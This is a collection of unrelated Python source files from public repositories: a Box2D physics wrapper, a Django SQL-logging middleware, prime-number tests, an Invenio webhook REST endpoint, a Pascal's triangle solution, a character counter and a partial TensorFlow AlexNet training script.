    exit()
# Standard Imports
from random import shuffle
# Load Elements Definitions
from .locals import *
# Load Elements Modules
from . import tools
from . import drawing
from . import add_objects
from . import callbacks
from . import camera
# Main Class
class Elements:
    """The class which handles all interaction with the box2d engine
    """
    # Settings
    run_physics = True   # Can pause the simulation
    element_count = 0    # Element Count
    renderer = None      # Drawing class (from drawing.py)

    # Default Input in Pixels! (can change to INPUT_METERS)
    input_unit = INPUT_PIXELS

    line_width = 0       # Line Width in Pixels (0 for fill)
    listener = None

    # Offset screen from world coordinate system (x, y) [meter]
    screen_offset = (0, 0)
    # Offset screen from world coordinate system (x, y) [pixel]
    screen_offset_pixel = (0, 0)

    # The internal coordination system is y+=up, x+=right
    # But it's possible to change the input coords to something else,
    # they will then be translated on input
    inputAxis_x_left = False  # positive to the right by default
    inputAxis_y_down = True   # positive to up by default

    mouseJoint = None

    def __init__(self, screen_size, gravity=(0.0, -9.0), ppm=100.0,
                 renderer='pygame'):
        """ Init the world with boundaries and gravity, and init colors.

        Parameters:
          screen_size .. (w, h) -- screen size in pixels [int]
          gravity ...... (x, y) in m/s^2 [float] default: (0.0, -9.0)
          ppm .......... pixels per meter [float] default: 100.0
          renderer ..... which drawing method to use (str) default:
                         'pygame'

        Return: class Elements()
        """
        self.set_screenSize(screen_size)
        self.set_drawingMethod(renderer)

        # Create Subclasses
        self.add = add_objects.Add(self)
        self.callbacks = callbacks.CallbackHandler(self)
        self.camera = camera.Camera(self)

        # Set Boundaries
        self.worldAABB = box2d.b2AABB()
        self.worldAABB.lowerBound = (-100.0, -100.0)
        self.worldAABB.upperBound = (100.0, 100.0)

        # Gravity + Bodies will sleep on outside
        self.gravity = gravity
        self.doSleep = True
        self.PIN_MOTOR_RADIUS = 2

        # Create the World
        self.world = box2d.b2World(self.worldAABB, self.gravity, self.doSleep)

        # Init Colors
        self.init_colors()

        # Set Pixels per Meter
        self.ppm = ppm

    def set_inputUnit(self, input_unit):
        """ Change the input unit to either meter or pixels

        Parameters:
          input ... INPUT_METERS or INPUT_PIXELS

        Return: -
        """
        self.input_unit = input_unit

    def set_inputAxisOrigin(self, left=True, top=False):
        """ Change the origin of the input coordinate system axis

        Parameters:
          left ... True or False -- x = 0 is at the left?
          top .... True or False -- y = 0 is at the top?

        Return: -
        """
        self.inputAxis_x_left = not left
        self.inputAxis_y_down = top

    def set_drawingMethod(self, m, *kw):
        """ Set a drawing method (from drawing.py)

        Parameters:
          m .... 'pygame' or 'cairo'
          *kw .. keywords to pass to the initializer of the drawing method

        Return: True if ok, False if no method identifier m found
        """
        try:
            # Resolves e.g. m='pygame' to drawing.draw_pygame(*kw).
            self.renderer = getattr(drawing, "draw_%s" % m)(*kw)
            return True
        except AttributeError:
            return False

    def set_screenSize(self, size):
        """ Set the current screen size

        Parameters:
          size ... (int(width), int(height)) in pixels

        Return: -
        """
        self.display_width, self.display_height = size

    def init_colors(self):
        """ Init self.colors with a fix set of hex colors

        Return: -
        """
        self.fixed_color = None
        self.cur_color = 0
        self.colors = [
            "#737934", "#729a55", "#040404", "#1d4e29", "#ae5004", "#615c57",
            "#6795ce", "#203d61", "#8f932b"
        ]
        shuffle(self.colors)

    def set_color(self, clr):
        """ Set a fixed color for all future Elements (until reset_color()
        is called)

        Parameters:
          clr ... Hex '#123123' or RGB ((r), (g), (b))

        Return: -
        """
        self.fixed_color = clr

    def reset_color(self):
        """ All Elements from now on will be drawn in random colors

        Return: -
        """
        self.fixed_color = None

    def get_color(self):
        """ Get a color - either the fixed one or the next from self.colors

        Return: clr = ((R), (G), (B))
        """
        if self.fixed_color is not None:
            return self.fixed_color

        # Cycle through the palette, reshuffling after each full pass.
        if self.cur_color == len(self.colors):
            self.cur_color = 0
            shuffle(self.colors)

        clr = self.colors[self.cur_color]
        if clr[0] == "#":
            clr = tools.hex2rgb(clr)
        self.cur_color += 1

        return clr

    def update(self, fps=50.0, vel_iterations=10, pos_iterations=8):
        """ Update the physics, if not paused (self.run_physics)

        Parameters:
          fps ............. fps with which the physics engine shall work
          vel_iterations .. velocity substeps per step for smoother
                            simulation
          pos_iterations .. position substeps per step for smoother
                            simulation

        Return: -
        """
        if self.run_physics:
            self.world.Step(1.0 / fps, vel_iterations, pos_iterations)

    def translate_coord(self, point):
        """ Flips the coordinates in another coordinate system orientation,
        if necessary (screen <> world coordinate system)
        """
        x, y = point

        if self.inputAxis_x_left:
            x = self.display_width - x

        if self.inputAxis_y_down:
            y = self.display_height - y

        return (x, y)

    def translate_coords(self, pointlist):
        """Flips the coordinates in another coordinate system orientation, if
        necessary (screen <> world coordinate system)
        """
        p_out = []
        for p in pointlist:
            p_out.append(self.translate_coord(p))
        return p_out

    def to_world(self, pos):
        """ Transfers a coordinate from the screen to the world
        coordinate system (pixels)

        - Change to the right axis orientation
        - Include the offset: screen -- world coordinate system
        - Include the scale factor (Screen coordinate system might have
          a scale factor)
        """
        dx, dy = self.screen_offset_pixel
        x = pos[0] / self.camera.scale_factor
        y = pos[1] / self.camera.scale_factor
        x, y = self.translate_coord((round(x), round(y)))
        return(x + dx, y + dy)

    def to_screen(self, pos):
        """Transfers a coordinate from the world to the screen coordinate
        system (pixels) and by the screen offset
        """
        dx, dy = self.screen_offset_pixel
        x = pos[0] - dx
        y = pos[1] - dy
        sx, sy = self.translate_coord((x, y))
        return (sx * self.camera.scale_factor, sy * self.camera.scale_factor)

    def meter_to_screen(self, i):
        # Convert a length in meters to on-screen pixels (ppm * camera zoom).
        return i * self.ppm * self.camera.scale_factor

    def get_bodies_at_pos(self, search_point, include_static=False, area=0.01):
        """ Check if given point (screen coordinates) is inside any body.
        If yes, return all found bodies, if not found return False
        """
        sx, sy = self.to_world(search_point)
        sx /= self.ppm
        sy /= self.ppm

        # Size of the query box around the point, compensated for zoom.
        f = area / self.camera.scale_factor

        AABB = box2d.b2AABB()
        AABB.lowerBound = (sx - f, sy - f)
        AABB.upperBound = (sx + f, sy + f)

        amount, shapes = self.world.Query(AABB, 2)

        if amount == 0:
            return False
        else:
            bodylist = []
            for s in shapes:
                body = s.GetBody()
                if not include_static:
                    if body.IsStatic() or body.GetMass() == 0.0:
                        continue

                # AABB query is coarse; TestPoint confirms the exact hit.
                if s.TestPoint(body.GetXForm(), (sx, sy)):
                    bodylist.append(body)

            return bodylist

    def draw(self):
        """ If a drawing method is specified, this function passes the objects
        to the module in pixels.

        Return: True if the objects were successfully drawn
          False if the renderer was not set or another error occurred
        """
        self.callbacks.start(CALLBACK_DRAWING_START)

        # No need to run through the loop if there's no way to draw
        if not self.renderer:
            return False

        if self.camera.track_body:
            # Get Body Center
            p1 = self.camera.track_body.GetWorldCenter()

            # Center the Camera There, False = Don't stop the tracking
            self.camera.center(self.to_screen((p1.x * self.ppm,
                                               p1.y * self.ppm)),
                               stopTrack=False)

        # Walk through all known elements
        self.renderer.start_drawing()

        for body in self.world.bodyList:
            xform = body.GetXForm()
            shape = body.GetShapeList()
            angle = body.GetAngle()

            if shape:
                # Per-body color override via userData, else palette default.
                userdata = body.GetUserData()
                if 'color' in userdata:
                    clr = userdata['color']
                else:
                    clr = self.colors[0]

                for shape in body.shapeList:
                    type_ = shape.GetType()

                    if type_ == box2d.e_circleShape:
                        position = box2d.b2Mul(xform, shape.GetLocalPosition())
                        pos = self.to_screen((position.x * self.ppm,
                                              position.y * self.ppm))
                        self.renderer.draw_circle(
                            clr, pos, self.meter_to_screen(shape.radius), angle)
                    elif type_ == box2d.e_polygonShape:
                        points = []
                        for v in shape.vertices:
                            pt = box2d.b2Mul(xform, v)
                            x, y = self.to_screen((pt.x * self.ppm,
                                                   pt.y * self.ppm))
                            points.append([x, y])
                        self.renderer.draw_polygon(clr, points)
                    else:
                        print "unknown shape type:%d" % shape.GetType()

        for joint in self.world.jointList:
            p2 = joint.GetAnchor1()
            p2 = self.to_screen((p2.x * self.ppm, p2.y * self.ppm))
            p1 = joint.GetAnchor2()
            p1 = self.to_screen((p1.x * self.ppm, p1.y * self.ppm))

            if isinstance(joint, box2d.b2RevoluteJoint):
                # Revolute joints are drawn as a small white pin.
                self.renderer.draw_circle((255, 255, 255), p1,
                                          self.PIN_MOTOR_RADIUS, 0)
            else:
                self.renderer.draw_lines((0, 0, 0), False, [p1, p2], 3)

        self.callbacks.start(CALLBACK_DRAWING_END)
        self.renderer.after_drawing()
        return True

    def set_pin_motor_radius(self, radius):
        # Pixel radius used by draw() for revolute-joint pins.
        self.PIN_MOTOR_RADIUS = radius

    def mouse_move(self, pos):
        # Convert a screen position to world meters and retarget the
        # active mouse joint (if any) for dragging.
        pos = self.to_world(pos)
        x, y = pos
        x /= self.ppm
        y /= self.ppm

        if self.mouseJoint:
            self.mouseJoint.SetTarget((x, y))

    def pickle_save(self, fn, additional_vars={}):
        # NOTE(review): mutable default argument kept for interface
        # compatibility; it is only read here, never mutated.
        import cPickle as pickle
        self.add.remove_mouseJoint()

        if not additional_vars and hasattr(self, '_pickle_vars'):
            additional_vars = dict((var, getattr(self, var))
                                   for var in self._pickle_vars)

        save_values = [self.world, box2d.pickle_fix(self.world,
                                                    additional_vars, 'save')]

        try:
            pickle.dump(save_values, open(fn, 'wb'))
        except Exception as s:
            print 'Pickling failed: ', s
            return

        print 'Saved to %s' % fn

    def pickle_load(self, fn, set_vars=True, additional_vars=[]):
        """
        Load the pickled world in file fn.

        additional_vars is a dictionary to be populated with the
        loaded variables.
        """
        import cPickle as pickle

        try:
            world, variables = pickle.load(open(fn, 'rb'))
            world = world._pickle_finalize()
            variables = box2d.pickle_fix(world, variables, 'load')
        except Exception as s:
            print 'Error while loading world: ', s
            return

        self.world = world

        if set_vars:
            # reset the additional saved variables:
            for var, value in variables.items():
                if hasattr(self, var):
                    setattr(self, var, value)
                else:
                    print 'Unknown property %s=%s' % (var, value)

        print 'Loaded from %s' % fn
        return variables

    def json_save(self, path, additional_vars={}, serialize=False):
        # Serialise the world (bodies, shapes, joints) to a JSON file.
        # Bodies are tagged with a temporary 'saveid' so joints can
        # reference them; the tags are removed again at the end.
        import json

        worldmodel = {}

        save_id_index = 1
        self.world.GetGroundBody().userData = {"saveid": 0}

        bodylist = []
        for body in self.world.GetBodyList():
            if not body == self.world.GetGroundBody():
                body.userData["saveid"] = save_id_index  # set temporary data
                save_id_index += 1

                shapelist = body.GetShapeList()
                modelbody = {}
                modelbody['position'] = body.position.tuple()
                modelbody['dynamic'] = body.IsDynamic()
                modelbody['userData'] = body.userData
                modelbody['angle'] = body.angle
                modelbody['angularVelocity'] = body.angularVelocity
                modelbody['linearVelocity'] = body.linearVelocity.tuple()

                if shapelist and len(shapelist) > 0:
                    shapes = []
                    for shape in shapelist:
                        modelshape = {}
                        modelshape['density'] = shape.density
                        modelshape['restitution'] = shape.restitution
                        modelshape['friction'] = shape.friction

                        shapename = shape.__class__.__name__
                        if shapename == "b2CircleShape":
                            modelshape['type'] = 'circle'
                            modelshape['radius'] = shape.radius
                            modelshape['localPosition'] = \
                                shape.localPosition.tuple()
                        if shapename == "b2PolygonShape":
                            modelshape['type'] = 'polygon'
                            modelshape['vertices'] = shape.vertices
                        shapes.append(modelshape)
                    modelbody['shapes'] = shapes

                bodylist.append(modelbody)

        worldmodel['bodylist'] = bodylist

        jointlist = []
        for joint in self.world.GetJointList():
            modeljoint = {}

            if joint.__class__.__name__ == "b2RevoluteJoint":
                modeljoint['type'] = 'revolute'
                modeljoint['anchor'] = joint.GetAnchor1().tuple()
                modeljoint['enableMotor'] = joint.enableMotor
                modeljoint['motorSpeed'] = joint.motorSpeed
                modeljoint['maxMotorTorque'] = joint.maxMotorTorque
            elif joint.__class__.__name__ == "b2DistanceJoint":
                modeljoint['type'] = 'distance'
                modeljoint['anchor1'] = joint.GetAnchor1().tuple()
                modeljoint['anchor2'] = joint.GetAnchor2().tuple()

            # Common joint fields: bodies are referenced by their saveids.
            modeljoint['body1'] = joint.body1.userData['saveid']
            modeljoint['body2'] = joint.body2.userData['saveid']
            modeljoint['collideConnected'] = joint.collideConnected
            modeljoint['userData'] = joint.userData

            jointlist.append(modeljoint)

        worldmodel['jointlist'] = jointlist

        controllerlist = []
        worldmodel['controllerlist'] = controllerlist

        if serialize:
            # Replace live body references in trackinfo with saveids so
            # the structure becomes JSON-serialisable.
            addvars = additional_vars
            trackinfo = addvars['trackinfo']
            backup = trackinfo

            for key, info in backup.iteritems():
                if not info[3]:
                    try:
                        trackinfo[key][0] = info[0].userData['saveid']
                        trackinfo[key][1] = info[1].userData['saveid']
                    except AttributeError:
                        pass
                else:
                    addvars['trackinfo'][key][0] = None
                    addvars['trackinfo'][key][1] = None

            additional_vars['trackinfo'] = trackinfo

        worldmodel['additional_vars'] = additional_vars

        f = open(path, 'w')
        f.write(json.dumps(worldmodel))
        f.close()

        for body in self.world.GetBodyList():
            del body.userData['saveid']  # remove temporary data

    def json_load(self, path, serialized=False):
        # Rebuild the world from a JSON file written by json_save().
        import json

        self.world.GetGroundBody().userData = {"saveid": 0}

        f = open(path, 'r')
        worldmodel = json.loads(f.read())
        f.close()

        # clean world
        for joint in self.world.GetJointList():
            self.world.DestroyJoint(joint)

        for body in self.world.GetBodyList():
            if body != self.world.GetGroundBody():
                self.world.DestroyBody(body)

        # load bodies
        for body in worldmodel['bodylist']:
            bodyDef = box2d.b2BodyDef()
            bodyDef.position = body['position']
            bodyDef.userData = body['userData']
            bodyDef.angle = body['angle']
            newBody = self.world.CreateBody(bodyDef)
            #_logger.debug(newBody)
            newBody.angularVelocity = body['angularVelocity']
            newBody.linearVelocity = body['linearVelocity']

            if 'shapes' in body:
                for shape in body['shapes']:
                    if shape['type'] == 'polygon':
                        polyDef = box2d.b2PolygonDef()
                        polyDef.setVertices(shape['vertices'])
                        polyDef.density = shape['density']
                        polyDef.restitution = shape['restitution']
                        polyDef.friction = shape['friction']
                        newBody.CreateShape(polyDef)
                    if shape['type'] == 'circle':
                        circleDef = box2d.b2CircleDef()
                        circleDef.radius = shape['radius']
                        circleDef.density = shape['density']
                        circleDef.restitution = shape['restitution']
                        circleDef.friction = shape['friction']
                        circleDef.localPosition = shape['localPosition']
                        newBody.CreateShape(circleDef)

                newBody.SetMassFromShapes()

        # Re-create joints, resolving saveids back to live bodies.
        for joint in worldmodel['jointlist']:
            if joint['type'] == 'distance':
                jointDef = box2d.b2DistanceJointDef()
                body1 = self.getBodyWithSaveId(joint['body1'])
                anch1 = joint['anchor1']
                body2 = self.getBodyWithSaveId(joint['body2'])
                anch2 = joint['anchor2']
                jointDef.collideConnected = joint['collideConnected']
                jointDef.Initialize(body1, body2, anch1, anch2)
                jointDef.SetUserData(joint['userData'])
                self.world.CreateJoint(jointDef)
            if joint['type'] == 'revolute':
                jointDef = box2d.b2RevoluteJointDef()
                body1 = self.getBodyWithSaveId(joint['body1'])
                body2 = self.getBodyWithSaveId(joint['body2'])
                anchor = joint['anchor']
                jointDef.Initialize(body1, body2, anchor)
                jointDef.SetUserData(joint['userData'])
                jointDef.enableMotor = joint['enableMotor']
                jointDef.motorSpeed = joint['motorSpeed']
                jointDef.maxMotorTorque = joint['maxMotorTorque']
                self.world.CreateJoint(jointDef)

        self.additional_vars = {}
        addvars = {}
        for (k, v) in worldmodel['additional_vars'].items():
            addvars[k] = v

        if serialized and 'trackinfo' in addvars:
            # Inverse of json_save(): saveids back to body references.
            trackinfo = addvars['trackinfo']
            for key, info in trackinfo.iteritems():
                if not info[3]:
                    addvars['trackinfo'][key][0] = \
                        self.getBodyWithSaveId(info[0])
                    addvars['trackinfo'][key][1] = \
                        self.getBodyWithSaveId(info[1])
                else:
                    addvars['trackinfo'][key][0] = None
                    addvars['trackinfo'][key][1] = None

        self.additional_vars = addvars

        for body in self.world.GetBodyList():
            del body.userData['saveid']  # remove temporary data

    def getBodyWithSaveId(self, saveid):
        # Linear search for the body tagged with the given temporary saveid.
        for body in self.world.GetBodyList():
            if body.userData['saveid'] == saveid:
                return body
|
samdroid-apps/physics
|
myelements/elements.py
|
Python
|
gpl-3.0
| 22,869
|
"""Middleware that prints all database queries
Use for fast database inspections.
Taken from https://djangosnippets.org/snippets/264/
"""
from django.db import connection
class TerminalLoggingMiddleware:
    """Dump every SQL query of the current request to an attached terminal."""

    @staticmethod
    def process_response(request, response):
        """Reads the query data and prints it"""
        from sys import stdout
        # Only emit when stdout is an interactive terminal.
        if stdout.isatty():
            fmt = "\033[1;31m[%s]\033[0m \033[1m%s\033[0m"
            for query in connection.queries:
                collapsed_sql = " ".join(query['sql'].split())
                print(fmt % (query['time'], collapsed_sql))
        return response
|
AmatanHead/collective-blog
|
collective_blog/middleware/sql_logger.py
|
Python
|
mit
| 584
|
"""
Some useful tools and utilities for wxPython.
"""
# XRCed is purposfully left out so epydoc won't document it
__all__ = [
'dbg',
'genaxmodule',
'helpviewer',
'img2img',
'img2png',
'img2py',
'img2xpm',
]
|
garrettcap/Bulletproof-Backup
|
wx/tools/__init__.py
|
Python
|
gpl-2.0
| 244
|
import pytest
from ..test_sequences import reference_values
from .primes import is_prime, largest_prime_factor,\
prime_sieve, smallest_prime_factor, generate_prime_factors_multiplicity
primes_list = reference_values['primes']
@pytest.mark.parametrize('n', range(-1, max(primes_list) + 1))
def test_is_prime(n: int) -> None:
    # Cross-check against the reference list, both with and without a
    # caller-supplied seed list of known primes.
    assert is_prime(n) == (n in primes_list)
    assert is_prime(n, [2, 3, 5]) == (n in primes_list)
@pytest.mark.parametrize('n', range(-100, 2))
def test_smallest_prime_factor_negative_error(n: int) -> None:
    # Inputs < 2 have no prime factorisation and must raise.
    with pytest.raises(ValueError):
        smallest_prime_factor(n)
@pytest.mark.parametrize('p,remainder', ((2, 1), (2, 5), (5, 77)))
def test_smallest_prime_factor(p: int, remainder: int) -> None:
    # p is chosen <= every prime factor of remainder, so it is the smallest.
    assert smallest_prime_factor(p * remainder) == p
@pytest.mark.parametrize('n', range(-100, 2))
def test_largest_prime_factor_negative_error(n: int) -> None:
    # Inputs < 2 have no prime factorisation and must raise.
    with pytest.raises(ValueError):
        largest_prime_factor(n)
@pytest.mark.parametrize('p,remainder', ((2, 1), (5, 2), (11, 35)))
def test_largest_prime_factor(p: int, remainder: int) -> None:
    # p is chosen >= every prime factor of remainder, so it is the largest.
    assert largest_prime_factor(p * remainder) == p
@pytest.mark.parametrize("n", range(1, 100))
def test_generate_prime_factors_multiplicity(n: int) -> None:
for factor, multiplicity in generate_prime_factors_multiplicity(n):
contribution = factor ** multiplicity
assert n % contribution == 0
n //= contribution
assert n == 1
def test_sieve() -> None:
    # Edge cases: negative and zero limits yield no primes; sieving up to
    # (largest reference prime + 1) must reproduce the reference list.
    assert len(list(prime_sieve(-1))) == 0
    n = max(primes_list)
    assert prime_sieve(0) == []
    assert list(prime_sieve(n + 1)) == primes_list
|
cryvate/project-euler
|
project_euler/library/number_theory/test_primes.py
|
Python
|
mit
| 1,630
|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from __future__ import absolute_import
from functools import wraps
from flask import request
from flask.ext.restful import Resource, abort
from invenio.ext.restful import require_api_auth, require_oauth_scopes
from invenio.modules.oauth2server.models import Scope
from invenio.modules.oauth2server.registry import scopes
from .models import Receiver, ReceiverDoesNotExists, InvalidPayload, \
WebhookError
def error_handler(f):
    """Decorator to handle exceptions.

    Maps webhook domain exceptions onto HTTP error responses:
    ReceiverDoesNotExists -> 404, InvalidPayload -> 415, any other
    WebhookError -> 500.
    """
    @wraps(f)
    def inner(*args, **kwargs):
        try:
            return f(*args, **kwargs)
        except ReceiverDoesNotExists:
            abort(404, message="Receiver does not exists.", status=404)
        except InvalidPayload as e:
            # e.args[0] carries the unsupported content type.
            abort(
                415,
                message="Receiver does not support the"
                " content-type '%s'." % e.args[0],
                status=415)
        except WebhookError as e:
            # NOTE(review): 'e' is unused -- the original error detail is
            # deliberately hidden behind a generic 500 message.
            abort(
                500,
                message="Internal server error",
                status=500
            )
    return inner
#
# Default decorators
#
# Applied as `method_decorators` to every REST resource in this module.
api_decorators = [
    error_handler,
]
#
# REST Resources
#
class ReceiverEventListResource(Resource):
    """Receiver event hook."""

    method_decorators = api_decorators

    def get(self, receiver_id=None):
        # Only POST is supported on this endpoint.
        abort(405)

    @require_api_auth()
    @require_oauth_scopes('webhooks:event')
    def post(self, receiver_id=None):
        """Dispatch the incoming event to the named receiver."""
        receiver = Receiver.get(receiver_id)
        receiver.consume_event(request.oauth.access_token.user_id)
        # 202: accepted for (possibly asynchronous) processing.
        return {'status': 202, 'message': 'Accepted'}, 202

    def put(self, receiver_id=None):
        abort(405)

    def delete(self, receiver_id=None):
        abort(405)

    def head(self, receiver_id=None):
        abort(405)

    def options(self, receiver_id=None):
        abort(405)

    def patch(self, receiver_id=None):
        abort(405)
#
# Register API resources
#
def setup_app(app, api):
    """Register the webhook REST resource and its OAuth scope."""
    api.add_resource(
        ReceiverEventListResource,
        '/api/hooks/receivers/<string:receiver_id>/events/',
    )

    # Scope registration needs an application context.
    with app.app_context():
        scopes.register(Scope(
            'webhooks:event',
            group='Notifications',
            help_text='Allow notifications from external service.',
            internal=True,
        ))
|
lnielsen/invenio
|
invenio/modules/webhooks/restful.py
|
Python
|
gpl-2.0
| 3,119
|
"""
Given numRows, generate the first numRows of Pascal's triangle.
For example, given numRows = 5,
Return
[
[1],
[1,1],
[1,2,1],
[1,3,3,1],
[1,4,6,4,1]
]
"""
class Solution(object):
    def generate(self, numRows):
        """Return the first numRows rows of Pascal's triangle.

        :type numRows: int
        :rtype: List[List[int]]
        """
        triangle = []
        for size in range(1, numRows + 1):
            if size <= 2:
                # First two rows are all ones.
                triangle.append([1] * size)
            else:
                # Interior entries are pairwise sums of the previous row,
                # framed by a leading and trailing 1.
                prev = triangle[-1]
                interior = [prev[k - 1] + prev[k] for k in range(1, size - 1)]
                triangle.append([1] + interior + [1])
        return triangle
"""
found a brilliant solution!
def generate(self, numRows):
res = [[1]]
for i in range(1, numRows):
res += [map(lambda x, y: x+y, res[-1] + [0], [0] + res[-1])]
return res[:numRows]
explanation: Any row can be constructed using the offset sum of the previous row. Example:
1 3 3 1 0
+ 0 1 3 3 1
= 1 4 6 4 1
"""
|
dichen001/Go4Jobs
|
JackChen/array/118. Pascal's Triangle.py
|
Python
|
gpl-3.0
| 910
|
#Brian Stamm
#CSC 110
#11.21.14
#Lab 9 - Advanced Strings
import os
def main():
    """Prompt for a file name, then report counts and percentages of
    upper-case, lower-case, digit and whitespace characters in it."""
    instructions()
    file_name = input("What is the name of the file we are using? ")
    upper_count = 0
    total_count = 0
    lower_count = 0
    digit_count = 0
    space_count = 0
    # 'with' guarantees the file is closed even if an error occurs
    # (the original left the handle open on exceptions).
    with open(file_name, 'r') as file:
        for line in file:
            for ch in line:
                if ch.isupper():
                    upper_count += 1
                    total_count += 1
                elif ch.islower():
                    lower_count += 1
                    total_count += 1
                elif ch.isdigit():
                    digit_count += 1
                    total_count += 1
                elif ch.isspace():
                    space_count += 1
                    total_count += 1
    # Guard against an empty (or punctuation-only) file, which previously
    # raised ZeroDivisionError.
    denominator = total_count if total_count else 1
    upper_percent = format(((upper_count / denominator) * 100), '.1f')
    lower_percent = format(((lower_count / denominator) * 100), '.1f')
    digit_percent = format(((digit_count / denominator) * 100), '.1f')
    space_percent = format(((space_count / denominator) * 100), '.1f')
    print("Upper case: ", upper_count)
    print("Upper percent: %s%%" % (upper_percent))
    print()
    print("Lower case: ", lower_count)
    print("Lower percent: %s%%" % (lower_percent))
    print()
    print("Digits: ", digit_count)
    print("Digit percent: %s%%" % (digit_percent))
    print()
    print("White Space: ", space_count)
    print("White Space percent: %s%%" % (space_percent))
def instructions():
    """Explain to the user what the program does and what input it expects."""
    for message in (
        "This program will give a total count of characters in a .txt file",
        "Be sure to include the extension (ie - .txt) at the end of the file name.",
        "",
    ):
        print(message)
# Script entry point: run the interactive character-count report.
main()
|
bkstamm67/python
|
pastHW/fileStringCounter.py
|
Python
|
mit
| 1,774
|
from test import *
import tensorflow as tf
# ---- experiment configuration (commented values are earlier settings) ----
ABS_PATH = "/home/elvis/work/ML/tensorflow/separa/"
SIZE = 4746            # total number of samples in the dataset
# SIZE = 828
LABEL = 5              # number of classes
# LABEL = 6
TRAIN_SIZE = 768
# ACCELERATION_FACTOR = 256
ACCELERATION_FACTOR = 2048
BASE_DIVIDE = 2048
# TRAIN_SIZE = 3200
BATCH_SIZE = 128
GLOBAL_STEP = 200000000   # effectively "run until the loss criterion stops us"
DECAY_STEPS = 100
EVAL_SIZE = SIZE - TRAIN_SIZE
# IMAGE_SIZE = 645 - 60
IMAGE_SIZE = 227       # AlexNet input resolution
NUM_CHANNEL = 3
REPORT_CONTROL = 10    # run evaluation/reporting every N steps
TRAIN_SLICE = (int(SIZE / LABEL * round((float(TRAIN_SIZE) / SIZE), 1)))
LEARNING_RATE = 0.001
# REGULAR = 3e-3
REGULAR = 3e-4         # L2 regularisation weight
DROP_OUT = 80e-2       # dropout keep probability
DECAY_RATE = 0.9995
MOMENTUM = 99e-2
# NOTE(review): ``random`` is presumably re-exported by ``from test import *``
# above -- confirm.
SEED = int(random.random() * 1000)
BATCH_NORMALIZATION = 1e-3
# SEED = 295.730694719
# SEED = 935.121374578
# SEED = 149.555544719
# SEED = 266.751015428 pretty good for this data .
# Destination CSV for manually-cleaned (filename, label) pairs.
out_file = "./cleaned_data_1.csv"
def data_clean(img, filename, label):
    """Interactively review one image and append its (filename, label)
    pair to ``out_file``.

    Keys: 'a' (97) accepts the predicted label, 'b' (98) prompts the
    operator for a replacement label; any other key re-displays the image.
    Python 2 code: uses the ``file()`` builtin and ``raw_input``.
    """
    window_name = "IMG"
    # Convert the one-hot label vector to its class index.
    label = np.argmax(label)
    print (filename)
    print (label)
    cv.namedWindow(window_name)
    while True:
        cv.imshow(window_name, img)
        character = cv.waitKey(100)
        if int(character) == 97:
            # 'a': keep the current label.
            f = file(out_file, 'a+')
            f.writelines(str(filename) + "," + str(label) + "\n")
            f.close()
            break
        elif int(character) == 98:
            # 'b': ask for a manual label and record that instead.
            f = file(out_file, 'a+')
            label = raw_input("input the label you wanna.")
            f.writelines(str(filename) + "," + str(label) + "\n")
            f.close()
            break
        else:
            continue
def main(argv=None):
    """End-to-end pipeline: interactively clean the dataset, build an
    AlexNet-style TF1 graph, and train until eval loss drops below 0.2.

    NOTE(review): the source arrived with indentation stripped; nesting of
    the reporting/averaging branches below was reconstructed from context
    and should be confirmed against the original file.
    """
    if argv is None:
        print ("ERROR FOR ARGV IS NONE")
    else:
        print (argv)
    global SIZE
    # ---- data loading and manual cleaning ----
    data, label, fileset = parse_new_data(SIZE=SIZE, IMAGE_SIZE=IMAGE_SIZE, NUM_CHANNEL=NUM_CHANNEL, LABEL=LABEL,
                                          BASE_DIVIDE=BASE_DIVIDE)
    for x in range(SIZE):
        data_clean(data[x], fileset[x], label[x])
    print (data.shape)
    print (data.dtype)
    print (fileset[0])
    print (label[0])
    print (fileset[1])
    print (label[1])
    print (fileset[-1])
    print (label[-1])
    SIZE = label.shape[0]
    data, label = alignment_data(data=data, label=label, LABEL=LABEL, BASE_DIVIDE=BASE_DIVIDE)
    data = approximate_normalization(data)
    train_data, train_label, eval_data, eval_label = random_sample(data, label, ACCELERATION_FACTOR, LABEL)
    TRAIN_SIZE = train_label.shape[0]
    EVAL_SIZE = eval_label.shape[0]
    train_data, train_label = random_shuffle(train_data, train_label)
    eval_data, eval_label = random_shuffle(eval_data, eval_label)
    train_data = train_data.astype(np.float32)
    eval_data = eval_data.astype(np.float32)
    train_label = train_label.astype(np.int64)
    eval_label = eval_label.astype(np.int64)
    print ("ALL SIZE FOR %d " % SIZE)
    print ("TRAIN SIZE FOR %d " % TRAIN_SIZE)
    # ---- graph placeholders ----
    feed_eval_data = tf.placeholder(dtype=tf.float32, shape=[None, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNEL],
                                    name="feed_eval_data")
    feed_eval_label = tf.placeholder(dtype=tf.int64, shape=[None, LABEL], name="feed_eval_label")
    feed_train_data = tf.placeholder(dtype=tf.float32, shape=[None, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNEL],
                                     name="feed_train_data")
    feed_train_label = tf.placeholder(dtype=tf.int64, shape=[None, LABEL], name="feed_train_label")
    # ---- AlexNet-style parameters (5 conv layers + 3 fully connected) ----
    convolution_weights_1 = tf.Variable(initial_value=tf.truncated_normal(shape=[11, 11, NUM_CHANNEL, 96], seed=SEED,
                                                                          stddev=0.01, dtype=tf.float32), name="conv1")
    convolution_biases_1 = tf.Variable(initial_value=tf.zeros(shape=[96], dtype=tf.float32), name="conv1_bias")
    convolution_weights2 = tf.Variable(initial_value=tf.truncated_normal(shape=[5, 5, 96, 256], seed=SEED,
                                                                         stddev=0.01, dtype=tf.float32), name="conv2")
    convolution_biases2 = tf.Variable(initial_value=tf.zeros(shape=[256], dtype=tf.float32), name="conv2_bias")
    convolution_weights3 = tf.Variable(initial_value=tf.truncated_normal(shape=[3, 3, 256, 384], seed=SEED,
                                                                         stddev=0.01, dtype=tf.float32), name="conv3")
    convolution_biases3 = tf.Variable(initial_value=tf.zeros(shape=[384], dtype=tf.float32), name="conv3_bias")
